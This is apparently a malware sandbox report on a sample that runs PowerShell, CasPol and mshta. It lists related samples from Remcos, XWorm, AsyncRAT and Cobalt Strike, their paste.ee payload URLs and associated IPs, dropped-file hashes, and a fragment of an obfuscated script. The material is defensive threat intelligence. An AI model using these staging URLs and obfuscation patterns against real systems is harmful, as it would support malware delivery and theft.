                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 2.16.96.33, 20.109.210.53, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 7372 because there are no executed function
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              01:11:59API Interceptor117x Sleep call for process: powershell.exe modified
                                                                                                              01:13:09API Interceptor4025750x Sleep call for process: CasPol.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              172.67.187.200geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/1QtpX
                                                                                                              MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/rYCH1
                                                                                                              LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                              • paste.ee/d/0jfAN
                                                                                                              PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/tiRif
                                                                                                              EWW.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/gFlKP
                                                                                                              ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/JxxYu
                                                                                                              Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/Bpplq
                                                                                                              Name.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • paste.ee/d/0kkOm
                                                                                                              517209487.vbsGet hashmaliciousXWormBrowse
                                                                                                              • paste.ee/d/s0kJG
                                                                                                              screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                                                              • paste.ee/d/GoCAw
                                                                                                              178.237.33.507Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                              • geoplugin.net/json.gp
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              paste.eePO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                              • 104.21.84.67
                                                                                                              NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.6
                                                                                                              greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 104.21.84.67
                                                                                                              goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                              • 172.67.187.200
                                                                                                              creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 104.21.84.67
                                                                                                              Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                              • 188.114.97.6
                                                                                                              SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.97.6
                                                                                                              Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                              • 188.114.96.6
                                                                                                              print preview.jsGet hashmaliciousFormBookBrowse
                                                                                                              • 172.67.187.200
                                                                                                              nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 104.21.84.67
                                                                                                              geoplugin.net7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              • 178.237.33.50
                                                                                                              x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                              • 178.237.33.50
                                                                                                              greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 178.237.33.50
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AS-COLOCROSSINGUSsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 107.172.24.189
                                                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 198.23.227.212
                                                                                                              NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                              • 23.95.235.29
                                                                                                              jOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              smb.ps1Get hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 107.172.88.151
                                                                                                              3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                              • 5.252.235.172
                                                                                                              job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                              • 5.252.235.172
                                                                                                              greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 192.3.101.149
                                                                                                              AS-COLOCROSSINGUSsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 107.172.24.189
                                                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                              • 198.23.227.212
                                                                                                              NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                              • 23.95.235.29
                                                                                                              jOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              smb.ps1Get hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 107.172.88.151
                                                                                                              3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
                                                                                                              • 107.172.43.186
                                                                                                              job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                              • 5.252.235.172
                                                                                                              job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                              • 5.252.235.172
                                                                                                              greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                              • 192.3.101.149
                                                                                                              CLOUDFLARENETUShttps://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                              • 104.26.10.61
                                                                                                              https://keepsmiling.co.in/front/indexxxx.html?em=NT43NUs6MllJO0ZdVTkzKSA8NzlDOkcgTjhWXU0=Get hashmaliciousUnknownBrowse
                                                                                                              • 104.21.89.91
                                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              • 104.21.79.7
                                                                                                              http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                                                                              • 172.67.41.229
                                                                                                              1.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 1.8.62.108
                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              • 104.21.79.7
                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                              • 104.21.52.25
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                              • 172.67.164.37
                                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 172.69.163.246
                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                              • 172.67.177.250
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ec2.htaGet hashmaliciousXWormBrowse
                                                                                                              • 172.67.187.200
                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                              • 172.67.187.200
                                                                                                              SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 172.67.187.200
                                                                                                              TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 172.67.187.200
                                                                                                              wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              • 172.67.187.200
                                                                                                              LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                                                              • 172.67.187.200
                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                              • 172.67.187.200
                                                                                                              Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                              • 172.67.187.200
                                                                                                              RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                              • 172.67.187.200
                                                                                                              FEDEX234598765.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                              • 172.67.187.200
                                                                                                              No context
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (3454), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):154352
                                                                                                              Entropy (8bit):3.8134053941949806
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:XNGVWmRC28eTt1DzYSyEgNGVWmRC28eTt1DzYSygNGVWmRC28eTt1DzYSy+:9q9t1DzYSKq9t1DzYSPq9t1DzYSN
                                                                                                              MD5:2E124153BE958647E84566B305ECF94E
                                                                                                              SHA1:D7D06FE6314EE8E4C31A971872632477EDE38248
                                                                                                              SHA-256:5B5835CEBCC79AE42D3EDC11DDCA5E2F6C4BF333E78D1B2D0733A091A9FD887E
                                                                                                              SHA-512:9BB7F048CFA817E406D63AFFC034EA89F7BEB6DD584521D5B1A531A032E22470BB9E9C8A12931B5838A77267ACF5FE64E8E788CAEE49C014348B75925614E450
                                                                                                              Malicious:false
                                                                                                              Preview:...... . . . .....N.g.p.H.G.G.o.p.q.f.z.b.u.I.i. .=. .".I.G.s.P.e.U.L.G.G.R.C.h.o.K.K.".....N.i.o.i.W.T.O.N.a.B.C.G.k.R.l. .=. .".q.W.G.k.Z.C.K.S.u.A.K.Z.H.C.C.".....s.L.k.q.r.P.L.L.W.P.d.O.L.z.A. .=. .".W.m.K.e.G.I.K.N.u.W.u.c.k.a.z.".........l.o.P.k.H.L.o.k.K.m.L.s.B.L.W. .=. .".i.U.W.K.i.p.L.I.K.t.u.i.p.W.N.".....A.i.U.u.K.n.k.d.b.K.R.L.P.L.u. .=. .".A.L.A.N.c.L.A.P.J.z.t.W.W.u.I.".....L.m.L.h.e.W.t.c.a.h.t.G.K.k.t. .=. .".R.C.Z.b.q.U.x.k.i.a.W.o.P.e.p.".....k.L.n.R.A.o.h.x.o.U.m.t.O.l.Q. .=. .".i.k.G.K.I.l.L.U.j.a.B.G.m.R.A.".....W.p.x.U.C.l.c.H.A.t.L.G.O.L.p. .=. .".j.C.P.u.R.o.c.B.S.W.G.o.W.i.K.".....Z.Z.W.c.G.i.f.I.O.o.x.s.O.u.G. .=. .".t.B.z.b.m.t.i.p.N.U.A.L.K.A.i.".....L.r.d.W.U.L.l.b.P.i.o.t.x.i.U. .=. .".L.W.I.A.x.L.L.i.m.c.a.L.P.A.t.".....p.k.Z.q.l.P.p.p.L.t.i.n.i.h.k. .=. .".p.L.k.t.b.C.U.L.L.P.L.d.p.G.A.".....l.Z.c.L.c.q.c.O.z.m.i.p.p.U.A. .=. .".G.x.G.H.W.C.T.z.x.Z.k.z.t.i.c.".....P.k.K.c.C.R.o.P.J.c.W.L.W.R.k. .=. .".N.W.h.t.N.b.p.U.x.R.O.b.a.x.q.".....o.S.d.K.b.J.Z.H.
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):963
                                                                                                              Entropy (8bit):5.018384957371898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                                              MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                                              SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                                              SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                                              SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                                              Malicious:false
                                                                                                              Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5829
                                                                                                              Entropy (8bit):4.901113710259376
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1144
                                                                                                              Entropy (8bit):5.290848674040258
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:32gSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NKM9r8Hd:GgSU4xympgv4RIoUP7mZ9tK8NF9u
                                                                                                              MD5:4331E6279D847E92D6B654CECE4305BF
                                                                                                              SHA1:E52D3DA01374F7C5BF5C2BF2CCBB54C92AC388F5
                                                                                                              SHA-256:54D683F53266320AAC50FF4F42DF00F95741BC9D870304FAB2E7EC0E9CFA3E6A
                                                                                                              SHA-512:2F627A386BC8E0F7DC5E7BB0007DDFC4DD70874A5E35BAD2FFD033236141337C5F5B80D2844984A80FA9EAB9FC07B8D3DF8A43D6D64C18D1F2CE592DAD9CD404
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 16 08:08:28 2024, 1st section name ".debug$S"
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1328
                                                                                                              Entropy (8bit):3.979229834509828
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:HNe9EuZfnGl5tWXDfHEwKEbsmfII+ycuZhN2oakSn9PNnqSqd:EBnGntWzrKPmg1ul2oa3nnqSK
                                                                                                              MD5:21B16C58DF745EB9C5395479631DDDD0
                                                                                                              SHA1:09F12D684D13388F6033D9ED97FE61963530A12C
                                                                                                              SHA-256:C2D081A051E2748B4C1206A9C6FBA61EF6768B043B6024A94DE56363F1B320B8
                                                                                                              SHA-512:DC9B5DF9DBB215B0C7A6FBF7DEB98408264F15FD0354DBB74E39C7E6F161710D12C110E9F053E57A2BEE2F4D658754F6454ADC83ADDD009CE3321B731BBDF057
                                                                                                              Malicious:false
                                                                                                              Preview:L....._g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP................|I.d1......w............4.......C:\Users\user\AppData\Local\Temp\RES38A1.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15728640
                                                                                                              Entropy (8bit):0.10805027086476268
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                                              MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                                              SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                                              SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                                              SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                                              Malicious:false
                                                                                                              Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
